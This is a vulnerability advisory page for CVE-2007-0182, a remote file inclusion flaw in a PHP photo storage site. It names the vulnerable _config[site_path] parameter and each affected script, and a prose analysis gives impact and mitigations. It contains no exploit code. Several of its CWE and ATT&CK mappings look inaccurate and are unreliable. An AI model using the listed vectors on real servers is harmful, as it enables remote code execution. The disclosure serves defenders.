CVE-2007-0182 in magic photo storage website
Summary
by MITRE
Multiple PHP remote file inclusion vulnerabilities in magic photo storage website allow remote attackers to execute arbitrary PHP code via a URL in the _config[site_path] parameter to (1) admin_password.php, (2) add_welcome_text.php, (3) admin_email.php, (4) add_templates.php, (5) admin_paypal_email.php, (6) approve_member.php, (7) delete_member.php, (8) index.php, (9) list_members.php, (10) membership_pricing.php, or (11) send_email.php in admin/; (12) config.php or (13) db_config.php in include/; or (14) add_category.php, (15) add_news.php, (16) change_catalog_template.php, (17) couple_milestone.php, (18) couple_profile.php, (19) delete_category.php, (20) index.php, (21) login.php, (22) logout.php, (23) register.php, (24) upload_photo.php, (25) user_catelog_password.php, (26) user_email.php, (27) user_extend.php, or (28) user_membership_password.php in user/. NOTE: the include/common_function.php vector is already covered by another candidate from the same date.
If you want to get best quality of vulnerability data, you may have to visit VulDB.
Analysis
by VulDB Data Team • 10/11/2025
This vulnerability represents a critical remote file inclusion flaw in a PHP-based magic photo storage website system that allows attackers to execute arbitrary code on the target server. The vulnerability exists due to improper input validation and sanitization of user-supplied data in multiple administrative and user-facing scripts. Attackers can exploit this by manipulating the _config[site_path] parameter to inject malicious URLs that will be included and executed by the vulnerable PHP application. This type of vulnerability falls under the CWE-88 category for improper neutralization of special elements used in an OS command and is classified as CWE-94 for arbitrary code execution through code injection.
The technical implementation of this vulnerability occurs when the application uses include or require statements with user-controllable parameters without proper validation. When an attacker supplies a malicious URL in the _config[site_path] parameter, the PHP interpreter processes this input and includes the remote file, effectively executing any PHP code contained within it. The affected files span across multiple directories including admin/, include/, and user/ directories, indicating a widespread vulnerability throughout the application's codebase. The attack vectors cover critical administrative functions such as password management, email configuration, membership handling, and user registration processes, making this vulnerability particularly dangerous.
The operational impact of this vulnerability is severe as it provides attackers with complete control over the affected web server. An attacker could upload malicious PHP shells, steal sensitive data, modify database contents, or use the compromised system as a launchpad for further attacks within the network. The vulnerability affects both administrative and user-facing components, meaning that even a low-privilege user account could potentially exploit this flaw if they can manipulate the _config[site_path] parameter. This aligns with ATT&CK technique T1059.007 for command and script interpreter and T1078.004 for valid accounts, as attackers would leverage legitimate application functionality to execute malicious code.
The attack surface includes multiple entry points across the application's functionality, making detection and remediation challenging. The vulnerability affects critical system components including database configuration files, email settings, membership management, and user authentication processes. This broad scope means that an attacker could compromise the entire system by exploiting any one of these vectors. Organizations should implement proper input validation, disable remote file inclusion, and use allow_url_include=Off in php.ini configuration to mitigate this vulnerability. Additionally, the principle of least privilege should be enforced, and all user inputs should be properly sanitized before being used in include or require statements.
The vulnerability demonstrates poor secure coding practices and highlights the importance of input validation and output encoding in web applications. The flaw represents a classic case of insecure direct object reference combined with improper input sanitization, allowing attackers to manipulate the application's include path. Security best practices dictate that all external inputs should be validated against a whitelist of acceptable values, and that remote file inclusion should be disabled unless absolutely necessary. This vulnerability also underscores the importance of regular security audits and code reviews to identify and remediate such critical flaws before they can be exploited by malicious actors in the wild.